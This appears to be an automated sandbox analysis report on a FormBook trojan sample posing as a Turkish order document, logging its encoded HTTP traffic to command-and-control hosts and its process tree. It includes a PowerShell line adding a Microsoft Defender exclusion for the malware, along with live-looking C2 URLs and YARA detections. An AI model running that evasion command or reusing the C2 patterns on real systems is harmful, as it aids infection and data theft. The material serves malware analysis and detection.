                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.44977838.47.232.233803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:46.825571060 CEST413OUTGET /0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:47.722235918 CEST289INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.44977974.208.236.247803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:52.771785975 CEST691OUTPOST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 68 6f 39 59 45 45 79 30 53 42 66 30 77 4d 36 31 54 4b 53 43 68 75 31 36 4a 2b 59 49 36 4d 4c 37 55 4d 39 53 38 52 6d 32 6b 62 71 4e 37 33 39 49 6a 4c 4a 6a 55 75 73 63 65 6d 76 48 77 49 56 4f 4a 70 46 47 33 61 68 64 67 49 35 72 79 36 6f 64 4a 6f 44 6b 2b 57 2f 37 56 64 36 73 75 57 79 51 36 71 55 4f 72 64 38 32 4c 76 78 69 46 67 78 37 55 53 31 62 4e 62 6b 76 76 70 47 41 39 5a 65 63 49 61 56 45 59 76 69 37 6d 34 74 4d 72 6c 67 52 41 42 6f 4c 6d 32 4c 6d 41 42 46 71 34 39 2b 78 35 67 30 61 4b 4a 56 77 52 42 6f 6f 39 33 30 6c 2f 4d 70 4d 59 36 4e 78 36 4d 78 75 36 65 73 37 6d 77 3d 3d
                                                      Data Ascii: lxRlvTSh=ho9YEEy0SBf0wM61TKSChu16J+YI6ML7UM9S8Rm2kbqN739IjLJjUuscemvHwIVOJpFG3ahdgI5ry6odJoDk+W/7Vd6suWyQ6qUOrd82LvxiFgx7US1bNbkvvpGA9ZecIaVEYvi7m4tMrlgRABoLm2LmABFq49+x5g0aKJVwRBoo930l/MpMY6Nx6Mxu6es7mw==
                                                      Jul 3, 2024 17:46:53.361476898 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:53 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.44978074.208.236.247803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:55.347995043 CEST711OUTPOST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 68 6f 39 59 45 45 79 30 53 42 66 30 77 74 4b 31 57 74 2b 43 6e 4f 31 35 46 65 59 49 6f 4d 4c 46 55 4d 78 53 38 54 4b 6d 6b 70 65 4e 36 53 52 49 67 50 56 6a 52 75 73 63 4d 47 76 43 30 49 56 46 4a 70 49 7a 33 66 5a 64 67 49 74 72 79 37 59 64 4b 66 66 37 39 6d 2f 35 63 39 36 71 74 6d 79 51 36 71 55 4f 72 63 59 49 4c 76 70 69 46 51 42 37 56 32 68 55 53 72 6b 73 71 70 47 41 73 4a 65 59 49 61 56 32 59 72 6a 6d 6d 36 6c 4d 72 6c 51 52 4f 31 38 49 73 32 4b 74 64 52 45 71 78 4d 48 37 30 41 64 70 46 2b 38 65 51 51 6f 4b 31 52 6c 2f 75 39 49 62 4b 36 70 43 6e 4c 34 61 33 64 52 79 39 2b 67 7a 6a 39 2b 6f 45 78 57 74 36 66 59 38 47 71 4a 62 5a 30 73 3d
                                                      Data Ascii: lxRlvTSh=ho9YEEy0SBf0wtK1Wt+CnO15FeYIoMLFUMxS8TKmkpeN6SRIgPVjRuscMGvC0IVFJpIz3fZdgItry7YdKff79m/5c96qtmyQ6qUOrcYILvpiFQB7V2hUSrksqpGAsJeYIaV2Yrjmm6lMrlQRO18Is2KtdREqxMH70AdpF+8eQQoK1Rl/u9IbK6pCnL4a3dRy9+gzj9+oExWt6fY8GqJbZ0s=
                                                      Jul 3, 2024 17:46:55.851665020 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:55 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.44978174.208.236.247803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:57.875768900 CEST10793OUTPOST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 68 6f 39 59 45 45 79 30 53 42 66 30 77 74 4b 31 57 74 2b 43 6e 4f 31 35 46 65 59 49 6f 4d 4c 46 55 4d 78 53 38 54 4b 6d 6b 70 47 4e 37 6b 46 49 69 75 56 6a 57 75 73 63 50 47 76 44 30 49 56 59 4a 70 51 2f 33 66 64 72 67 4b 56 72 39 34 51 64 4c 75 66 37 6d 57 2f 35 44 74 36 76 75 57 7a 49 36 71 45 43 72 64 6f 49 4c 76 70 69 46 57 6c 37 63 43 31 55 4a 72 6b 76 76 70 47 32 39 5a 65 77 49 61 4d 44 59 72 32 52 6d 4b 46 4d 73 42 30 52 44 67 6f 49 76 57 4b 76 4f 68 45 45 78 4e 37 34 30 41 41 53 46 37 42 46 51 51 63 4b 77 56 6f 77 31 4e 51 47 56 37 70 66 78 35 64 67 78 73 4e 4e 6c 75 39 47 6c 74 79 43 51 6c 4c 45 31 76 39 5a 57 6f 59 51 61 78 35 37 6c 7a 64 58 49 45 57 68 7a 55 4f 4e 38 38 41 4e 37 79 71 33 64 2f 76 4c 41 49 33 77 4d 31 64 35 77 42 41 61 74 64 45 6b 62 49 6f 44 54 66 63 45 6a 4a 4a 70 56 4f 46 70 4b 72 53 64 70 42 76 70 76 71 67 4b 65 58 70 45 42 6e 67 32 77 4d 37 34 62 4b 57 79 74 4f 70 64 54 57 41 6a 4a 71 56 36 46 6d 39 4f 41 69 6a 43 6b 4c 53 6d 44 44 66 47 73 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=ho9YEEy0SBf0wtK1Wt+CnO15FeYIoMLFUMxS8TKmkpGN7kFIiuVjWuscPGvD0IVYJpQ/3fdrgKVr94QdLuf7mW/5Dt6vuWzI6qECrdoILvpiFWl7cC1UJrkvvpG29ZewIaMDYr2RmKFMsB0RDgoIvWKvOhEExN740AASF7BFQQcKwVow1NQGV7pfx5dgxsNNlu9GltyCQlLE1v9ZWoYQax57lzdXIEWhzUON88AN7yq3d/vLAI3wM1d5wBAatdEkbIoDTfcEjJJpVOFpKrSdpBvpvqgKeXpEBng2wM74bKWytOpdTWAjJqV6Fm9OAijCkLSmDDfGs6k6+TcDrf80TY5aV1wNjzeiHHT0gHGa8KQfXkhlM+Ei20Pwb8W0nu1xWLsRag4aFtg1/tBw2gCT5dqBe6AO4CEuhtzAdi72Gda4Mguk2/i9UH9nOEi3MxYF+obJQGfYOCwS/Rb+d6FUbpw38XaLMLzHsKmbRiT7wSCbMRClqNKNscaMt+e+8L+G7E0TfZSmVCFUdVLPlchwLxQudCCzSte6l2SrtdoaK8u7wuAK/vNevGe0wwFjRTvCmtxeuRjKN8UaGy+e+QoKKG8t6N4OPbBCirPQhlwO2ci85WhTX0xTibE83btCliVVOo/eaU28C5ZszfrsUqvG04m9hqgCywUatbIDKokc72oQblU76/2eZyBJ+FgiBLaS+x7nv9gu9vYD4ODKbRl6B9O6XlmXdAuvwwbwTmm661EBmJbEa4iFPeIVQ32iT32x3gN4jXEYaxkJflMbwO9bN99YwE7hRvnIqjjEkoOhWgkLbV4LuFNs4uBzULeySBqINLS8e6vRxjDU7wQFnG/n5A8GkDRlJX0NOcd/ZdhOHrqYq9XnF1zXNAPHM0Nq0Bvw+NRZS4rLGTawe6pN9XjVqldQWHX5Qb31kEQv97NmflQvZlzbIm1xUx9wYcxooU81jE6cLCpFN+zjcAdPAFxgL7soRdIZ4AsDACx7X/hpTcD [TRUNCATED]
                                                      Jul 3, 2024 17:46:58.458940983 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:58 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.44978274.208.236.247803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:47:00.404169083 CEST419OUTGET /tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:47:00.950731993 CEST770INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Content-Length: 626
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:47:00 GMT
                                                      Server: Apache
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.44978384.32.84.32803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:47:14.092008114 CEST682OUTPOST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 53 79 36 78 56 30 45 52 36 43 67 6a 59 37 30 43 6b 61 75 33 53 61 76 76 6f 4c 37 53 55 78 54 47 79 49 47 2b 74 77 53 4e 63 44 6f 6e 35 77 57 6c 74 50 68 6a 47 39 78 49 49 6e 2b 53 74 62 32 6a 36 76 75 32 63 4e 61 42 6d 70 77 68 2f 69 4a 4d 53 37 77 4c 51 73 37 6c 4a 38 7a 37 31 35 4b 49 6d 47 72 38 34 6f 39 49 39 72 36 79 6f 2b 4b 68 49 65 39 38 67 51 54 31 31 31 76 33 48 58 77 74 6d 37 63 7a 39 4a 72 73 32 57 6e 75 32 2f 57 48 47 5a 62 52 59 32 75 4f 59 76 54 73 48 69 57 37 2b 34 65 4e 76 31 6d 35 71 51 4d 4c 35 37 61 72 6a 43 73 68 77 48 71 73 67 55 38 39 65 34 6a 5a 69 77 3d 3d
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjY70Ckau3SavvoL7SUxTGyIG+twSNcDon5wWltPhjG9xIIn+Stb2j6vu2cNaBmpwh/iJMS7wLQs7lJ8z715KImGr84o9I9r6yo+KhIe98gQT111v3HXwtm7cz9Jrs2Wnu2/WHGZbRY2uOYvTsHiW7+4eNv1m5qQML57arjCshwHqsgU89e4jZiw==


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      42192.168.2.44978484.32.84.3280
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:47:17.014297962 CEST702OUTPOST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 53 79 36 78 56 30 45 52 36 43 67 6a 59 61 45 43 68 39 43 33 54 36 76 6f 69 72 37 53 47 78 54 4b 79 4a 36 2b 74 31 71 64 63 56 59 6e 36 56 79 6c 71 38 35 6a 42 39 78 49 63 33 2b 54 77 4c 32 6f 36 76 69 2b 63 49 69 42 6d 70 6b 68 2f 6a 35 4d 54 49 49 49 52 38 37 6e 47 63 7a 35 78 35 4b 49 6d 47 72 38 34 73 74 78 39 72 79 79 72 4f 36 68 4a 38 56 7a 74 77 54 79 79 31 76 33 57 48 77 70 6d 37 63 46 39 4d 50 4b 32 55 76 75 32 36 71 48 47 4e 32 48 52 32 75 49 47 66 53 47 49 6a 75 79 6d 70 57 43 33 57 4b 2b 71 30 4d 38 31 64 4c 78 79 7a 4e 32 69 48 4f 66 39 54 31 4a 54 37 65 51 35 33 56 39 59 4d 72 32 61 6f 6d 59 45 51 50 4a 6d 56 58 68 45 6f 55 3d
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjYaECh9C3T6voir7SGxTKyJ6+t1qdcVYn6Vylq85jB9xIc3+TwL2o6vi+cIiBmpkh/j5MTIIIR87nGcz5x5KImGr84stx9ryyrO6hJ8VztwTyy1v3WHwpm7cF9MPK2Uvu26qHGN2HR2uIGfSGIjuympWC3WK+q0M81dLxyzN2iHOf9T1JT7eQ53V9YMr2aomYEQPJmVXhEoU=


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:11:43:06
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0x810000
                                                      File size:1'015'808 bytes
                                                      MD5 hash:860575AA9868349D8CBDBE70D45098C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:11:43:08
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0xf40000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:11:43:08
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0xdc0000
                                                      File size:1'015'808 bytes
                                                      MD5 hash:860575AA9868349D8CBDBE70D45098C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
